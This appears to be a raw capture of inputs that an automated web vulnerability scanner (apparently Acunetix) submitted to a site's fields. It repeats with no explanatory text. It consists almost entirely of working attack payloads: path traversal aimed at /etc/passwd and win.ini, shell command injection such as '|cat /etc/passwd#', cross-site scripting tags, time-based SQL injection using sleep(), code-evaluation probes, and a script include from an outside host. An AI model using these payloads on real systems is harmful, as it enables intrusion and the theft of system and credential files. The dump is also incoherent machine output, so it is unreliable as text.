
../../../../../../../../../../etc/passwd.jpg

1

${99274+100465}

1

1

`cat /etc/passwd`

1

-1)

1<img/src=">" onerror=alert(943620)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1

'|'ld

-1))

1<ScRiPt%20>prompt(990146)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n999029=v910792

)

1some_inexistent_file_with_long_name%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

c4v4W4fw'

"|"ld

!(()&&!|*|*|

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Kh6knCcw')

\xf6<img acu onmouseover=prompt(945948) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

1

'"()

'

/etc/passwd

testasp.vulnweb.com

1

'

1<input autofocus onfocus=prompt(983601)>

GVMDPdis'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitnfUNTwXl1N.bxss.me/

&dir

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_oNR3w <ScRiPt >prompt(920730)</ScRiPt>

1

acunetix_wvs_invalid_filename

1

z5ru2fJ1'

'&dir&'

1

file:///etc/passwd

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

cNS7bRVx')

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

wfLYe6e8'))

1

1

http://www.acunetix.tst

1

'"

|dir

1

comments/.

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(963550)</ScRiPt>

<!--

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(997305)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

"|dir

1

1_987968

1

1

../../../../../../../../../../windows/win.ini

1

acu10467\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10467

1

1

../../../../../../../../../../boot.ini

1

1

acux7638\xc0\xbez1\xc0\xbcz2a\x90bcxuca7638

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(916926)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(966299)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(984015)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900952></ScRiPt>

1

1

1

1<ScRiPt >prompt(911993)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(961991)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932717)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(910458))>

1

1<iframe src='data:text/html

1

response.write(9288249*9228037)

1

1

1

WEB-INF/web.xml

1<body onload=prompt(960850)>

1

'+response.write(9288249*9228037)+'

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961428)>

1

1

1

&cat /etc/passwd&

"+response.write(9288249*9228037)+"

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(932770)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

'&cat /etc/passwd&'

1

1

1<img/src=">" onerror=alert(956624)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(919806)</sCripT>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1&lt

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

cat /etc/passwd

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(914493) //\xf6>

${100167+100492}

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<input autofocus onfocus=prompt(951033)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n985020=v913483

|cat /etc/passwd#

2l52HzoE'

1

1

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

)

TglAZfKF')

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

kP3cG0qH'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

-1

'

testasp.vulnweb.com

1_qvR4w <ScRiPt >prompt(908303)</ScRiPt>

/etc/passwd

1

1

1

1

"

-1)

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

AzvJR0tZ'

acunetix_wvs_invalid_filename

||cat /etc/passwd

http://hitmGhDBWYjcp.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

F0uDT1HB')

1

1

comments

1

1

1

1

&dir

OTDVspaF'))

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

'&dir&'

1

1

'"

1

1'"()&%<ScRiPt >prompt(989813)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

"&dir&"

WEB-INF/web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(907333)</ScRiPt>

|dir

1

1

WEB-INF\web.xml

1

1_945302

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

acu3917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3917

1

"|dir

../../../../../../../../../../boot.ini

acux4456\xc0\xbez1\xc0\xbcz2a\x90bcxuca4456

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(965408)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(918500)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(959573)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973803></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(900385)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(949990)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952145)"></g></svg>

response.write(9449221*9888493)

1

1<div style=width:expression(prompt(967653))>

1

1

1

WEB-INF/web.xml

'+response.write(9449221*9888493)+'

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(915639)>

"+response.write(9449221*9888493)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979308)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(970072)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img/src=">" onerror=alert(919011)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

1

1<ScRiPt%20>prompt(986000)</sCripT>

1

1

`cat /etc/passwd`

${99290+99498}

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

|cat /etc/passwd#

1&lt

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1YLa50iV'

1

\xf6<img acu onmouseover=prompt(987950) //\xf6>

'|'ld

1

1&n999654=v908929

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

syV64ZIq')

1

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(915899)>

testasp.vulnweb.com

1

"|"ld

HwRM96sI'))

<a href='http://www.acunetix.com'>website security</a>

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

'"()

1

[url=http://www.acunetix.com]website security[/url]

1

^(#$!@#$)(()))******

/etc/passwd

1

-1)

1_9VUrx <ScRiPt >prompt(979472)</ScRiPt>

'

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

"

"

1

1

1

||cat /etc/passwd

LiBs0dsZ'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hit3I9bm1Daja.bxss.me/

1

&dir

k3iX4EFC')

1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

wVXImCVN'))

1

'&dir&'

1

file:///etc/passwd

http://www.acunetix.tst

1

comments

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(907052)</ScRiPt>

1

1

comments

1

<!--

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(978161)</ScRiPt>

|dir

1

1

1

1

comments/.

WEB-INF\web.xml

1

1

'|dir

1_913920

1

../../../../../../../../../../windows/win.ini

1

1

1

acu4694\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4694

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4676\xc0\xbez1\xc0\xbcz2a\x90bcxuca4676

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(993767)</ScRiPt>

1

1

1

1

1

................windowswin.ini

1<script>prompt(901763)</script>

1

1

1

1<ScRiPt >prompt(943837)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975572></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(950550)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986685)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925485)"></g></svg>

1

1

1<div style=width:expression(prompt(908754))>

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

1

1

1<body onload=prompt(965822)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982383)>

1

1

1

1<img src=xyz OnErRor=prompt(940521)>

1

1

1<img/src=">" onerror=alert(966170)>

1

1<ScRiPt%20>prompt(973039)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(953251) //\xf6>

1

1

1<input autofocus onfocus=prompt(912593)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_WnUHE <ScRiPt >prompt(960326)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9616504*9152144)

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9616504*9152144)+'

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9616504*9152144)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

-1

1

-1)

1

${99140+100186}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n972198=v977119

|cat /etc/passwd#

1

-1))

)

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

0WgY2SR7'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

'

testasp.vulnweb.com

K6NrmKv8')

^(#$!@#$)(()))******

1

"

/etc/passwd

1

1

1

02eYKLUE'))

1

'

http://hitj3sGN8X0PH.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

-1)

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

'"

1

tZG2OgLA'

comments/.

'&dir&'

1

1'"()&%<ScRiPt >prompt(922950)</ScRiPt>

K2VS25Og')

1

<!--

file:///etc/passwd

'"()&%<ScRiPt >prompt(956929)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

TP0VzBwJ'))

1

|dir

1_910342

WEB-INF/web.xml

1

1

1

1

acu5837\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5837

WEB-INF\web.xml

'|dir

1

1

"|dir

../../../../../../../../../../windows/win.ini

acux2356\xc0\xbez1\xc0\xbcz2a\x90bcxuca2356

1

1

1

1<ScRiPt >prompt(989370)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(997295)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(959991)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(948050)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(966979)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966336)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9619770*9147549)

1<div style=width:expression(prompt(976001))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9619770*9147549)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9619770*9147549)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(996828)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965262)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1<img src=xyz OnErRor=prompt(908638)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

${99134+100499}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(948281)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1))

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(964002)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

vsUnR41m'

1&n961941=v920259

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

1

testasp.vulnweb.com

"|"ld

OGM61qIi')

)

\xf6<img acu onmouseover=prompt(980628) //\xf6>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

3TWekHaY'))

1

'"()

1<input autofocus onfocus=prompt(918680)>

'

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

'

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1_DfwvQ <ScRiPt >prompt(978037)</ScRiPt>

1

http://hitt3W3oukI5k.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

vlQiJ2my'

1

1

1

1

1

'&dir&'

http://www.acunetix.tst

1

1

Pja3LFrm')

comments

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(904713)</ScRiPt>

'"

"&dir&"

1

k6wMT8CX'))

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(957674)</ScRiPt>

WEB-INF/web.xml

1

1

1

1_929590

'|dir

1

1

1

1

WEB-INF\web.xml

1

1

acu3722\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3722

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

acux6547\xc0\xbez1\xc0\xbcz2a\x90bcxuca6547

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(920741)</ScRiPt>

1

1

1

1<script>prompt(996207)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(907642)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963548></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(938945)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(919586)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9597697*9151146)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915571)"></g></svg>

1

'+response.write(9597697*9151146)+'

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(970834))>

1

1

'&cat /etc/passwd&'

1

"+response.write(9597697*9151146)+"

1<iframe src='data:text/html

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1<body onload=prompt(991021)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927352)>

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(987729)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

-1)

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(922758)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${99576+100219}

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n990252=v962426

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928282)</sCripT>

1

awfzGyzZ'

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

N1sPNx75')

)

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(943900) //\xf6>

!(()&&!|*|*|

hT7jjNxm'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(910567)>

'"()

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

testasp.vulnweb.com

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

-1)

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_Se0xV <ScRiPt >prompt(954703)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hit2KNRUGwagq.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

M2VNzVt0'

1

1

1

1

comments

1

U3zdj5gA')

&dir

1

comments

1

file:///etc/passwd

1

1

1

1

'&dir&'

5i6zMjk1'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(923939)</ScRiPt>

1

1

1

1

|dir

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(998422)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1_983265

"|dir

../../../../../../../../../../boot.ini

1

1

1

1

acu7856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7856

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5468\xc0\xbez1\xc0\xbcz2a\x90bcxuca5468

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(907390)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(992293)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992783)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994488></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(945572)</ScRiPt>

response.write(9674573*9358797)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'+response.write(9674573*9358797)+'

1<video><source onerror="javascript:prompt(950211)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

&cat /etc/passwd&

"+response.write(9674573*9358797)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910163)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(934615))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1
